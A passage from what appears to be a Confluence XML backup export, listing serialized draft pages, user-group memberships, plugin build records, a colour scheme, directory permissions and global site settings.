||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196645</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196646</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196647</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196648</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196649</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.089</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98338</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">8</property>
|
||||
<collection name="children" class="java.util.Collection"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
|
||||
</element>
|
||||
<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
|
||||
</element>
|
||||
<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
|
||||
</element>
|
||||
<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</element>
|
||||
<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</element>
|
||||
<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
|
||||
</element>
|
||||
<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</element>
|
||||
<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</element>
|
||||
<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98326</id>
|
||||
<property name="hibernateVersion">13</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262194</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.093</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98325</id>
|
||||
<property name="hibernateVersion">10</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262181</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.096</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98324</id>
|
||||
<property name="hibernateVersion">10</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262179</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.100</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98323</id>
|
||||
<property name="hibernateVersion">7</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262157</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262158</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:52.104</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="SpaceDescription" package="com.atlassian.confluence.spaces">
|
||||
<id name="id">98357</id>
|
||||
<property name="hibernateVersion">17</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163851</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-04-14 11:55:11.912</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="HibernateMembership" package="com.atlassian.crowd.embedded.hibernate2">
|
||||
<id name="id">589826</id>
|
||||
<property name="parentGroup" class="InternalGroup" package="com.atlassian.crowd.model.group"><id name="id">425985</id>
|
||||
</property>
|
||||
<property name="userMember" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="HibernateMembership" package="com.atlassian.crowd.embedded.hibernate2">
|
||||
<id name="id">589825</id>
|
||||
<property name="parentGroup" class="InternalGroup" package="com.atlassian.crowd.model.group"><id name="id">425986</id>
|
||||
</property>
|
||||
<property name="userMember" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="GlobalDescription" package="com.atlassian.confluence.setup.settings">
|
||||
<id name="id">98359</id>
|
||||
<property name="hibernateVersion">1</property>
|
||||
<property name="title"/><property name="lowerTitle"/><property name="version">1</property>
|
||||
<property name="creationDate">2023-11-09 06:04:19.475</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:19.475</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
</object>
|
||||
<object class="PersonalInformation" package="com.atlassian.confluence.user">
|
||||
<id name="id">98358</id>
|
||||
<property name="hibernateVersion">1</property>
|
||||
<property name="title"/><property name="lowerTitle"/><property name="version">1</property>
|
||||
<property name="creationDate">2023-11-09 06:04:18.930</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:04:18.930</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="user" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="InternalGroup" package="com.atlassian.crowd.model.group">
|
||||
<id name="id">425986</id>
|
||||
<property name="name"><![CDATA[confluence-users]]></property>
|
||||
<property name="lowerName"><![CDATA[confluence-users]]></property>
|
||||
<property name="active">true</property>
|
||||
<property name="local">false</property>
|
||||
<property name="createdDate">2023-11-09 06:04:18.320</property>
|
||||
<property name="updatedDate">2023-11-09 06:04:18.320</property>
|
||||
<property name="description"/><property name="type" enum-class="GroupType" package="com.atlassian.crowd.model.group">GROUP</property>
|
||||
<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
|
||||
</property>
|
||||
<property name="externalId"/></object>
|
||||
<object class="InternalGroup" package="com.atlassian.crowd.model.group">
|
||||
<id name="id">425985</id>
|
||||
<property name="name"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="lowerName"><![CDATA[confluence-administrators]]></property>
|
||||
<property name="active">true</property>
|
||||
<property name="local">false</property>
|
||||
<property name="createdDate">2023-11-09 06:04:18.284</property>
|
||||
<property name="updatedDate">2023-11-09 06:04:18.284</property>
|
||||
<property name="description"/><property name="type" enum-class="GroupType" package="com.atlassian.crowd.model.group">GROUP</property>
|
||||
<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
|
||||
</property>
|
||||
<property name="externalId"/></object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32802</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[confluence.extra.masterdetail:build]]></property>
|
||||
<property name="value"><![CDATA[<string>2</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32803</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-inline-comments:build]]></property>
|
||||
<property name="value"><![CDATA[<string>1</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32800</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.plugins.atlassian-nav-links-plugin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>1</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32801</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-inline-tasks:build]]></property>
|
||||
<property name="value"><![CDATA[<string>3</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32798</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.plugins.atlassian-whitelist-core-plugin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>3</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32799</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.plugins.custom_apps.hasCustomOrder]]></property>
|
||||
<property name="value"><![CDATA[<string>false</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32796</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-edge-index:build]]></property>
|
||||
<property name="value"><![CDATA[<string>1</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32797</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.crowd.embedded.admin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>3</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32794</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.audit.plugin:audit-config:retention:period]]></property>
|
||||
<property name="value"><![CDATA[<string>P3Y</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32795</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.confluence.extra.team-calendars:build]]></property>
|
||||
<property name="value"><![CDATA[<string>1312121002</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32792</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.migration.agent:mp-status]]></property>
|
||||
<property name="value"><![CDATA[<string>{"pluginVersionLastChecked":"3.4.6","outdated":true,"upgradeBy":null,"timestamp":1699509836998}</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32793</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.audit.atlassian-audit-plugin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>2</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32790</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[atlassian.confluence.plugin.counter]]></property>
|
||||
<property name="value"><![CDATA[<int>3</int>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32791</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[reindex.status]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.index.status.ReIndexJob>
|
||||
<id>a051f6a2-cf76-4d3d-999d-ccfffe5e65d3</id>
|
||||
<startTime>2023-11-09T06:03:55.369232Z</startTime>
|
||||
<finishTime>2023-11-09T06:03:59.229997Z</finishTime>
|
||||
<stage>COMPLETE</stage>
|
||||
<acknowledged>false</acknowledged>
|
||||
<rebuildingProgress>
|
||||
<total>54</total>
|
||||
<processed>54</processed>
|
||||
</rebuildingProgress>
|
||||
<lastRebuildingUpdate>2023-11-09T06:03:58.418741Z</lastRebuildingUpdate>
|
||||
<nodeStatuses class="list"/>
|
||||
</com.atlassian.confluence.index.status.ReIndexJob>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32788</id>
|
||||
<property name="context"><![CDATA[ds]]></property>
|
||||
<property name="key"><![CDATA[atlassian.confluence.colour.scheme]]></property>
|
||||
<property name="value"><![CDATA[<colourScheme>
|
||||
<colours>
|
||||
<entry>
|
||||
<string>property.style.topbarmenuselectedbgcolour</string>
|
||||
<string>#336699</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.menuselectedbgcolour</string>
|
||||
<string>#6699cc</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.navtextcolour</string>
|
||||
<string>#ffffff</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.bordercolour</string>
|
||||
<string>#6699cc</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.navselectedtextcolour</string>
|
||||
<string>#ffffff</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.breadcrumbstextcolour</string>
|
||||
<string>#ffffff</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.topbarcolour</string>
|
||||
<string>#003366</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.navselectedbgcolour</string>
|
||||
<string>#003366</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.linkcolour</string>
|
||||
<string>#326ca6</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.navbgcolour</string>
|
||||
<string>#6699cc</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.menuitemselectedtextcolour</string>
|
||||
<string>#ffffff</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.menuitemselectedbgcolour</string>
|
||||
<string>#6699cc</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.headingtextcolour</string>
|
||||
<string>#000000</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.spacenamecolour</string>
|
||||
<string>#999999</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.menuitemtextcolour</string>
|
||||
<string>#535353</string>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>property.style.topbarmenuitemtextcolour</string>
|
||||
<string>#326ca6</string>
|
||||
</entry>
|
||||
</colours>
|
||||
</colourScheme>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32789</id>
|
||||
<property name="context"><![CDATA[ds]]></property>
|
||||
<property name="key"><![CDATA[trash.date.migration.time]]></property>
|
||||
<property name="value"><![CDATA[<instant>2023-11-09T06:03:52.619272Z</instant>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32818</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.troubleshooting.thready.configuration.enabled]]></property>
|
||||
<property name="value"><![CDATA[<string>true</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32819</id>
|
||||
<property name="context"><![CDATA[_CALENDAR_ee65026d81383713d11480a2da8ced1608ea1448]]></property>
|
||||
<property name="key"><![CDATA[legacySubCalendarsMigrationCutoffDate]]></property>
|
||||
<property name="value"><![CDATA[<long>1699509861003</long>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32816</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.analytics.client.configuration..policy_acknowledged]]></property>
|
||||
<property name="value"><![CDATA[<string>true</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32817</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm.log.PluginSettingsAuditLogService:log:upm_audit_log_v3]]></property>
|
||||
<property name="value"><![CDATA[<list>
|
||||
<string>{"userKey":"Confluence","date":1699509860734,"i18nKey":"upm.auditLog.upm.startup","entryType":"UPM_STARTUP","params":[]}</string>
|
||||
</list>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32814</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.analytics.client.configuration.uuid]]></property>
|
||||
<property name="value"><![CDATA[<string>102be6f5-2e40-4d37-bd5e-e52aef8f80fb</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32815</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.analytics.client.configuration.serverid]]></property>
|
||||
<property name="value"><![CDATA[<string>BNRR-EUMS-GPB5-FJVB</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32812</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-create-content-plugin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>5</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32813</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[gadget.counter]]></property>
|
||||
<property name="value"><![CDATA[<int>2</int>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32810</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.plugins.authentication.sso.config.sso-type]]></property>
|
||||
<property name="value"><![CDATA[<string>NONE</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32811</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.plugins.authentication.sso.config.show-login-form]]></property>
|
||||
<property name="value"><![CDATA[<string>true</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32808</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm.atlassian-universal-plugin-manager-plugin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>5</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32809</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.plugins.authentication.atlassian-authentication-plugin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>6</string>]]></property>
|
||||
</object>
|
||||
<object class="DirectoryMapping" package="com.atlassian.crowd.model.application">
|
||||
<id name="id">393217</id>
|
||||
<property name="application" class="ApplicationImpl" package="com.atlassian.crowd.model.application"><id name="id">327681</id>
|
||||
</property>
|
||||
<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
|
||||
</property>
|
||||
<property name="allowAllToAuthenticate">true</property>
|
||||
<collection name="allowedOperations" class="java.util.Set"><element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_GROUP_ATTRIBUTE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_ROLE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_USER</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_ROLE_ATTRIBUTE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_USER</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_USER_ATTRIBUTE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_GROUP</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_USER</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_ROLE</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_GROUP</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_GROUP</element>
|
||||
<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_ROLE</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32806</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-collaborative-editor-plugin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>1</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32807</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-roadmap-plugin:build]]></property>
|
||||
<property name="value"><![CDATA[<string>6</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32804</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-space-ia:build]]></property>
|
||||
<property name="value"><![CDATA[<string>1</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32805</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[synchrony_collaborative_editor_app_registered]]></property>
|
||||
<property name="value"><![CDATA[<string>true</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32770</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[confluence.server.installation.date]]></property>
|
||||
<property name="value"><![CDATA[<date>2023-11-09 06:02:30.133 UTC</date>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32771</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[atlassian.confluence.settings]]></property>
|
||||
<property name="value"><![CDATA[<settings>
|
||||
<doNotSave>false</doNotSave>
|
||||
<allowCamelCase>false</allowCamelCase>
|
||||
<allowTrackbacks>false</allowTrackbacks>
|
||||
<allowThreadedComments>true</allowThreadedComments>
|
||||
<externalUserManagement>false</externalUserManagement>
|
||||
<denyPublicSignup>true</denyPublicSignup>
|
||||
<emailAdminMessageOff>false</emailAdminMessageOff>
|
||||
<almostSupportPeriodEndMessageOff>false</almostSupportPeriodEndMessageOff>
|
||||
<senMissingInLicenseMessageOff>true</senMissingInLicenseMessageOff>
|
||||
<baseUrlAdminMessageOff>false</baseUrlAdminMessageOff>
|
||||
<allowRemoteApi>false</allowRemoteApi>
|
||||
<allowRemoteApiAnonymous>false</allowRemoteApiAnonymous>
|
||||
<antiXssMode>true</antiXssMode>
|
||||
<gzippingResponse>true</gzippingResponse>
|
||||
<disableLogo>false</disableLogo>
|
||||
<sharedMode>false</sharedMode>
|
||||
<enableDidYouMean>false</enableDidYouMean>
|
||||
<enableQuickNav>true</enableQuickNav>
|
||||
<enableSpaceStyles>false</enableSpaceStyles>
|
||||
<enableOpenSearch>true</enableOpenSearch>
|
||||
<showSystemInfoIn500Page>false</showSystemInfoIn500Page>
|
||||
<showApplicationTitle>false</showApplicationTitle>
|
||||
<captchaSettings>
|
||||
<enableCaptcha>false</enableCaptcha>
|
||||
<enableDebug>false</enableDebug>
|
||||
<captchaGroups class="list"/>
|
||||
<exclude>registered</exclude>
|
||||
</captchaSettings>
|
||||
<customHtmlSettings>
|
||||
<beforeHeadEnd></beforeHeadEnd>
|
||||
<afterBodyStart></afterBodyStart>
|
||||
<beforeBodyEnd></beforeBodyEnd>
|
||||
</customHtmlSettings>
|
||||
<colourSchemesSettings>
|
||||
<colourSchemeType>custom</colourSchemeType>
|
||||
</colourSchemesSettings>
|
||||
<loginManagerSettings>
|
||||
<enableElevatedSecurityCheck>true</enableElevatedSecurityCheck>
|
||||
<loginAttemptsThreshold>3</loginAttemptsThreshold>
|
||||
</loginManagerSettings>
|
||||
<confluenceHttpParameters>
|
||||
<connectionTimeout>10000</connectionTimeout>
|
||||
<socketTimeout>10000</socketTimeout>
|
||||
<enabled>true</enabled>
|
||||
</confluenceHttpParameters>
|
||||
<attachmentMaxSize>104857600</attachmentMaxSize>
|
||||
<auditLogRetentionNumber>3</auditLogRetentionNumber>
|
||||
<auditLogRetentionUnit>Years</auditLogRetentionUnit>
|
||||
<draftSaveInterval>30000</draftSaveInterval>
|
||||
<maxAttachmentsInUI>5</maxAttachmentsInUI>
|
||||
<siteTitle>Confluence</siteTitle>
|
||||
<documentationUrlPattern>http://docs.atlassian.com/confluence/docs-{0}/{1}</documentationUrlPattern>
|
||||
<showContactAdministratorsForm>true</showContactAdministratorsForm>
|
||||
